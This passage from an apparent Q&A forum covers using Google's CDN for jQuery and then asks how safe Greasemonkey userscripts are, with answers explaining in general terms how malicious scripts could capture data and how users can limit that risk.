This means if Google's CDN goes down, you would have to quickly adjust what you're serving to use your local copy instead. So defending against that becomes a monitoring exercise (of Google's servers; don't overdo it or they'll be displeased) with a failover at the server level to start serving pages with a local path. (Or a Microsoft path, on the theory that Google and Microsoft probably aren't sharing underlying CDN technology, given how well they get along.)
For me, the answer for most sites is probably: Go ahead and use the CDN, react if and when Google's CDN for libraries goes down. The flip side is: If you're happy with your overall page load performance loading it from your server, little harm in doing that until or unless traffic is high enough that you're looking to eke every last bit of performance out of things. But lots (and lots and lots) of sites rely on Google's CDN, if it goes down, your site will be far from alone in failing...
Could give you 6,953 reasons why I still let Google host jQuery for me.
The main advantages being
Decreased Latency
Increased parallelism
Better caching
One important note on why Firefox sometimes doesn't cache what it should:
Firebug has a small option called "Disable Browser Cache".
Developers and designers often turn it on, and then Firefox doesn't cache anything, even when Firebug is not active!
So just open Firebug, go to the Net tab, and make sure that option is turned off.
I think this is a very costly quirk in Firebug that wastes a lot of bandwidth for unsuspecting developers!
The point is, that if many websites reference the CDN-based versions, chances are high that users coming to your site already have the script in their cache.

How safe is Greasemonkey?

I've never actually used greasemonkey, but I was considering using it.
Considering that GreaseMonkey allows you to let random people on the Internet change the behavior of your favorite websites, how safe can it be?
Can they steal my passwords? Look at my private data? Do things I didn't want to do?
How safe is Greasemonkey?
Thanks
Considering that GreaseMonkey allows you to let random people on the Internet change the behavior of your favorite websites, how safe can it be?
It's as safe as you allow it to be - but you aren't very clear, so let's look at it from a few perspectives:
Web Developer
Greasemonkey can't do anything to your website that a person with telnet can't already do to your website. It automates things a bit, but other than that if greasemonkey is a security hole, then your website design is flawed - not greasemonkey.
Internet user with Greasemonkey loaded
Like anything else you load on your system, greasemonkey can be used against you. Don't load scripts onto your system unless you trust the source (in both meanings of the term 'source'). It's fairly limited and sandboxed, but that doesn't mean it's safe, merely that it's harder for someone to do something nefarious.
Internet user without Greasemonkey
If you do not load greasemonkey or any of its scripts, it cannot affect you in any way. Greasemonkey does not alter the websites you visit unless you've loaded it on your system.
Greasemonkey developer
There's not much you can do beyond what can already be done with XUL and javascript, but it is possible to trash your mozilla and/or firefox profile, and possibly other parts of your system. Unlikely, difficult to do on purpose or maliciously, but it's not a bulletproof utility. Develop responsibly.
-Adam
Considering that GreaseMonkey allows you to let random people on the Internet change the behavior of your favorite websites
Random people whose UserScript you have installed. No one can force you to install a UserScript.
Can they steal my passwords?
Yes, a UserScript could modify a login page so it sent your password to an attacker.
No, it cannot look at your current passwords, or for websites the UserScript isn't enabled for
Look at my private data?
Yes, if your private data is viewable on a website that you've given a UserScript access to
Do things I didn't want to do?
Yes, a UserScript could do things to a webpage (you've given it access to) that are unwanted
How safe is GreaseMonkey?
As safe as the individual UserScripts you have installed
When used with discretion, Greasemonkey should be perfectly safe to install and use. While it is definitely possible to do all manners of mischief with carte-blanche Javascript access to pages, Greasemonkey scripts are restricted to specific URLs, and will not run on sites that are not specified by the URL patterns in their headers.
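For example, those URL restrictions live in the metadata block at the top of every userscript; the names and URLs below are purely illustrative:
// ==UserScript==
// @name        Example site tweak
// @namespace   http://example.com/scripts
// @description Demonstrates restricting where a script may run
// @include     http://www.example.com/articles/*
// @exclude     http://www.example.com/account/*
// ==/UserScript==

// The body below never executes on pages outside the @include patterns
alert("Userscript running on " + location.href);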
That being said, a basic rule of thumb is to consider most information on pages with Greasemonkey scripts active to be accessible to those scripts. It is technically feasible to play games like replacing input boxes (in which you might enter passwords or personal info), read any data on the pages, and send data collected to a third party. Greasemonkey scripts do run in an effective sandbox within the browser, and shouldn't be able to affect your computer outside of Firefox.
That being said, in some respects, the risk is comparable to or less than that of installing any other small pieces of open source software. Since Greasemonkey scripts are simple open source Javascript files, it's relatively easy for a programmer to take a look inside and make sure it does what it says it does. As always, run strangers' code (of any form) with care, and take the time to skim the source code if the software is important to you.
In general though, Greasemonkey scripts should be pretty safe. Try to use scripts with a large number of reviews and users, since these are likely to be more thoroughly vetted and analyzed by the community.
Happy userscripting!
Yes, userscripts can steal your passwords. That's the bottom line. Don't use firefox addons or userscripts on work or government computers without referring to your bosses.
Unlike Firefox addons, userscripts are not formally vetted. (Firefox 'experimental' addons are also not vetted.) You can register and add a malicious script to userscripts.org in a moment.
Userscripts are very unsafe. The cross-site scripting ability means that it's no difficulty at all to send off your details/passwords to an evil server quite invisibly. And the script can do it for any site. Ignore the other answers that attempt to dismiss/minimise this issue. There are two issues: evil script writers putting their evil wares onto userscripts.org, and scripts that break Greasemonkey's sandbox and so are vulnerable to being used by malicious code on a hacked site that would otherwise be restricted to same-domain.
In the case of evil script authors you can examine the scripts for code that sends your details; not much fun. At the very least you could restrict the script to particular sites by editing the 'include/exclude' clause. That doesn't solve the problem but at least it won't be sending off your banking credentials (unless you've used the same login details). It's a pity there isn't an 'includexss' clause to restrict xss requests, which would effectively solve the problem since, crucially, it would be easy to check even for non-developers. (the Firefox addon "RequestPolicy" doesn't block userscripts.)
Unsafe scripts: look for any use of 'unsafeWindow'. There are other risky calls. Greasemonkey doesn't warn you of their use when the script is installed. Use of these calls doesn't mean the script is unsafe, just that the script writer had better be good at secure programming; it's difficult and most aren't. I avoid writing scripts that would need these calls. There are popular, high-download scripts that use these calls.
Firefox plugins/addons at Mozilla.org have similar problems to userscripts but at least they are formally vetted. The vetting/review includes the all-important code-review. Nevertheless there are clever techniques for avoiding the detection of evil code without the need of obfuscation. Also the addon may be hosted on an (unknown to anyone) hacked site. Unfortunately mozilla also lists 'experimental' addons which are not vetted and have had malicious code. You get a warning but how many know the real significance. I didn't until I picked up security knowledge. I never install such addons.
Userscripts are not formally vetted. Unless a script has a lot of installs I examine the code. Even so a high-install script could still have had the script-writer's account hijacked and script modified. Even if I examine a script the use of anti-detection programming means I may not see the evil. Perhaps the best bet is to examine outgoing requests with "Tamper Data" firefox addon, but a clever script will delay or infrequently send data. It's a tactical war, unfortunately. Ironically only microsoft's certificate based activeX objects really approach a real solution in developer traceability (but didn't go far enough).
It's true that a firefox addon gives an evil-doer greater exposure to potential victims, since firefox addons are generally more popular and so seem more likely to be targeted, but the firefox vetting process makes userscripts more attractive to the evil-doer since they are not vetted. Arguably a low-download userscript can still get a criminal plenty of valuable logins until it is spotted, while also giving the benefit of the relative obscurity and low community churn of userscripts, as well as a low chance of anyone code-reviewing it. You can't depend on firefox addons' popularity to protect you from evil userscripts.
As a non-developer you are dependent on other users spotting evil scripts/addons. How likely is that? Who knows. The truth is it's a crap security model.
Ultimately I use firefox for general browsing and Google Chrome (without greasemonkey/plugins) for admin purposes. Chrome also has a usable 'profiles' feature (totally separate browsing spaces) which is effectively like using different browsers. I've set up three chrome profiles to make myself even more safe: email/general-admin, banking, ebay/paypal. Firefox has unusable profiles (in my experience) but I prefer firefox as a browser which is why I still use it for uncritical browsing. Profiles also protect against old fashioned browser security holes and hacked sites, at least limiting their scope. But make sure you use different passwords. Another approach is a clean bootable ubuntu install on a USB stick for critical admin (see here http://www.geekconnection.org/remastersys/).
Jetpack's special trust model, rather like the PGP trust network, which underlines the seriousness of this issue, should hopefully mitigate it. Jetpack is Firefox's new kid on the block: a kind of super Greasemonkey.
